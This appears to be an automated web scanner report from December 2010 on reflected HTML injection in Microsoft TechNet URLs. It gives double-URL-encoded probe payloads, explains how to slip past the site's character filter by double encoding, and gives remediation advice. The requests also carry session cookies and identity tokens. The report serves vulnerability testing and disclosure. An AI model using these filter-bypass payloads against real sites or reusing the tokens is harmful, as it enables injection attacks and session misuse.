GET /en-usd7b79%2522%253e%253ca%253e6e48a9d51bc/library/bb727024.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:22:11 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd7b79"><a>6e48a9d51bc/library/bb727024" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d263%2522%253e%253ca%253eefc03635f13 was submitted in the REST URL parameter 2. This input was echoed as 2d263"><a>efc03635f13 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library2d263%2522%253e%253ca%253eefc03635f13/bb727024.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:22:56 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2d263"><a>efc03635f13/bb727024" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c816%2522%253e%253ca%253ed902524dd17 was submitted in the REST URL parameter 3. This input was echoed as 1c816"><a>d902524dd17 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727024.aspx1c816%2522%253e%253ca%253ed902524dd17 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:23:47 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727024.aspx1c816"><a>d902524dd17" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9931%2522%253e%253ca%253e1ccd3b44585 was submitted in the REST URL parameter 1. This input was echoed as f9931"><a>1ccd3b44585 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usf9931%2522%253e%253ca%253e1ccd3b44585/library/bb727026.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:18:28 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usf9931"><a>1ccd3b44585/library/bb727026" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ed7%2522%253e%253ca%253e250422238c2 was submitted in the REST URL parameter 2. This input was echoed as c9ed7"><a>250422238c2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryc9ed7%2522%253e%253ca%253e250422238c2/bb727026.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:19:18 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc9ed7"><a>250422238c2/bb727026" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6676d%2522%253e%253ca%253ecdf872b7052 was submitted in the REST URL parameter 3. This input was echoed as 6676d"><a>cdf872b7052 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727026.aspx6676d%2522%253e%253ca%253ecdf872b7052 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
